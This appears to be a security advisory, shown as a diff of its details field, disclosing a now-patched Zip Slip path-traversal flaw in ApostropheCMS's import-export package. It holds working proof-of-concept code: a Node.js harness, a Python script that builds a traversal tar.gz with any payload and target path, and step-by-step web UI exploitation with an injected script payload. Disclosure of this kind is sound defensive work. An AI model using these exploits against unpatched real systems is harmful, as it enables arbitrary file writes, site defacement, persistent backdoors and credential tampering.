+ "details": "**Reported:** 2026-03-08 \n**Status:** patched and released in version 3.5.3 of `@apostrophecms/import-export`\n\n---\n\n## Product\n\n| Field | Value |\n|---|---|\n| Repository | `apostrophecms/apostrophe` (monorepo) |\n| Affected Package | `@apostrophecms/import-export` |\n| Affected File | `packages/import-export/lib/formats/gzip.js` |\n| Affected Function | `extract(filepath, exportPath)` — lines ~132–157 |\n| Minimum Required Permission | **Global Content Modify** (any editor-level user with import access) |\n\n---\n\n## Vulnerability Summary\n\nThe `extract()` function in `gzip.js` constructs file-write paths using:\n\n```js\nfs.createWriteStream(path.join(exportPath, header.name))\n```\n\n`path.join()` does **not** resolve or sanitise traversal segments such as `../`. It concatenates them as-is, meaning a tar entry named `../../evil.js` resolves to a path **outside** the intended extraction directory. No canonical-path check is performed before the write stream is opened.\n\nThis is a textbook **Zip Slip** vulnerability. Any user who has been granted the **Global Content Modify** permission — a role routinely assigned to content editors and site managers — can upload a crafted `.tar.gz` file through the standard CMS import UI and write attacker-controlled content to **any path the Node.js process can reach on the host filesystem**.\n\n---\n\n## Security Impact\n\nThis vulnerability provides **unauthenticated-equivalent arbitrary file write** to any user with content editor permissions. The full impact chain is:\n\n### 1. Arbitrary File Write\nWrite any file to any path the Node.js process user can access. Confirmed writable targets in testing:\n\n- Any path the CMS process has permission to\n\n### 2. Static Web Directory — Defacement & Malicious Asset Injection\nApostropheCMS serves `<project-root>/public/` via Express static middleware:\n\n```js\n// packages/apostrophe/modules/@apostrophecms/asset/index.js\nexpress.static(self.apos.rootDir + '/public', self.options.static || {})\n```\n\nA traversal payload targeting `public/` makes any uploaded file **directly HTTP-accessible**:\n\nThis enables:\n- Full site defacement\n- Serving phishing pages from the legitimate CMS domain\n- Injecting malicious JavaScript served to all site visitors (stored XSS at scale)\n\n### 3. Persistent Backdoor / RCE (Post-Restart)\nIf the traversal targets any `.js` file loaded by Node.js on startup (e.g., a module `index.js`, a config file, a routes file), the payload becomes a **persistent backdoor** that executes with the CMS process privileges on the next server restart. In container/cloud environments, restarts happen automatically on deploy, crash, or health-check failure — meaning the attacker does not need to manually trigger one.\n\n### 4. Credential and Secret File Overwrite\nOverwrite `.env`, `app.config.js`, database seed files, or any config file to:\n- Exfiltrate database credentials on next load\n- Redirect authentication to an attacker-controlled backend\n- Disable security controls (rate limiting, MFA, CSRF)\n\n### 5. Denial of Service\nOverwrite any critical application file (`package.json`, `node_modules` entries, etc.) with garbage data, rendering the application unbootable.\n\n---\n\n## Required Permission\n\n**Global Content Modify** — this is a standard editor-level permission routinely granted to content managers, blog editors, and site administrators in typical ApostropheCMS deployments. It is **not** an administrator-only capability. Any organisation that delegates content editing to non-technical staff is exposed.\n\n---\n\n## Proof of Concept\n\nTwo PoC artifacts are provided:\n\n| File | Purpose |\n|---|---|\n| `tmp-import-export-zip-slip-poc.js` | Automated Node.js harness — verifies the write happens without a browser |\n| `make-slip-tar.py` | Attacker tool — generates a real `.tar.gz` for upload via the CMS web UI |\n\n---\n\n### PoC 1 — Automated Verification (`tmp-import-export-zip-slip-poc.js`)\n\n```js\nconst fs = require('node:fs');\nconst fsp = require('node:fs/promises');\nconst path = require('node:path');\nconst os = require('node:os');\nconst zlib = require('node:zlib');\nconst tar = require('tar-stream');\n\nconst gzipFormat = require('./packages/import-export/lib/formats/gzip.js');\n\nasync function makeArchive(archivePath) {\n const pack = tar.pack();\n const gzip = zlib.createGzip();\n const out = fs.createWriteStream(archivePath);\n\n const done = new Promise((resolve, reject) => {\n out.on('finish', resolve);\n out.on('error', reject);\n gzip.on('error', reject);\n pack.on('error', reject);\n });\n\n pack.pipe(gzip).pipe(out);\n\n pack.entry({ name: 'aposDocs.json' }, '[]');\n pack.entry({ name: 'aposAttachments.json' }, '[]');\n\n // Traversal payload\n pack.entry({ name: '../../zip-slip-pwned.txt' }, 'PWNED_FROM_TAR');\n\n pack.finalize();\n await done;\n}\n\n(async () => {\n const base = await fsp.mkdtemp(path.join(os.tmpdir(), 'apos-zip-slip-'));\n const archivePath = path.join(base, 'evil-export.gz');\n const exportPath = archivePath.replace(/\\.gz$/, '');\n\n await makeArchive(archivePath);\n\n const expectedOutsideWrite = path.resolve(exportPath, '../../zip-slip-pwned.txt');\n\n // Ensure clean pre-state\n try { await fsp.unlink(expectedOutsideWrite); } catch (_) {}\n\n await gzipFormat.input(archivePath);\n\n const exists = fs.existsSync(expectedOutsideWrite);\n const content = exists ? await fsp.readFile(expectedOutsideWrite, 'utf8') : '';\n\n console.log('EXPORT_PATH:', exportPath);\n console.log('EXPECTED_OUTSIDE_WRITE:', expectedOutsideWrite);\n console.log('ZIP_SLIP_WRITE_HAPPENED:', exists);\n console.log('WRITTEN_CONTENT:', content.trim());\n})();\n```\n**Run:**\n```powershell\nnode .\\tmp-import-export-zip-slip-poc.js\n```\n\n**Observed output (confirmed):**\n```\nEXPORT_PATH: C:\\Users\\...\\AppData\\Local\\Temp\\apos-zip-slip-XXXXXX\\evil-export\nEXPECTED_OUTSIDE_WRITE: C:\\Users\\...\\AppData\\Local\\Temp\\zip-slip-pwned.txt\nZIP_SLIP_WRITE_HAPPENED: true\nWRITTEN_CONTENT: PWNED_FROM_TAR\n```\n\nThe file `zip-slip-pwned.txt` is written **two directories above** the extraction root, confirming path traversal.\n\n---\n\n### PoC 2 — Web UI Exploitation (`make-slip-tar.py`)\n\n**Script (`make-slip-tar.py`):**\n```python\nimport tarfile, io, sys\n\nif len(sys.argv) != 3:\n print(\"Usage: python make-slip-tar.py <payload_file> <target_path>\")\n sys.exit(1)\n\npayload_file = sys.argv[1]\ntarget_path = sys.argv[2]\nout = \"evil-slip.tar.gz\"\n\nwith open(payload_file, \"rb\") as f:\n payload = f.read()\n\nwith tarfile.open(out, \"w:gz\") as t:\n docs = io.BytesIO(b\"[]\")\n info = tarfile.TarInfo(\"aposDocs.json\")\n info.size = len(docs.getvalue())\n t.addfile(info, docs)\n\n atts = io.BytesIO(b\"[]\")\n info = tarfile.TarInfo(\"aposAttachments.json\")\n info.size = len(atts.getvalue())\n t.addfile(info, atts)\n\n info = tarfile.TarInfo(target_path)\n info.size = len(payload)\n t.addfile(info, io.BytesIO(payload))\n\nprint(\"created\", out)\n```\n\n---\n\n## Steps to Reproduce (Web UI — Real Exploitation)\n\n### Step 1 — Create the payload file\n\nCreate a file with the content you want to write to the server. For a static web directory write:\n\n```bash\necho \"<!-- injected by attacker --><script>alert('XSS')</script>\" > payload.html\n```\n\n### Step 2 — Generate the malicious archive\n\nUse the traversal path that reaches the CMS `public/` directory. The number of `../` segments depends on where the CMS stores its temporary extraction directory relative to the project root — typically 2–4 levels up. Adjust as needed:\n\n```bash\npython make-slip-tar.py payload.html \"../../../../<project-root>/public/injected.html\"\n```\n\nThis creates `evil-slip.tar.gz` containing:\n- `aposDocs.json` — empty, required by the importer\n- `aposAttachments.json` — empty, required by the importer\n- `../../../../<project-root>/public/injected.html` — the traversal payload\n\n### Step 3 — Upload via CMS Import UI\n\n1. Log in to the CMS with any account that has **Global Content Modify** permission.\n2. Navigate to **Open Global Settings → More Options → Import**.\n3. Select `evil-slip.tar.gz` and click **Import**.\n4. The CMS accepts the file and begins extraction — no error is shown.\n\n### Step 4 — Confirm the write\n\n```bash\ncurl http://localhost:3000/injected.html\n```\n\nExpected response:\n```\n<!-- injected by attacker --><script>alert('XSS')</script>\n```\n\nThe file is now being served from the CMS's own domain to all visitors.\n\n### Video POC : https://drive.google.com/file/d/1bbuQnoJv_xjM_uvfjnstmTh07FB7VqGH/view?usp=sharing\n---",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments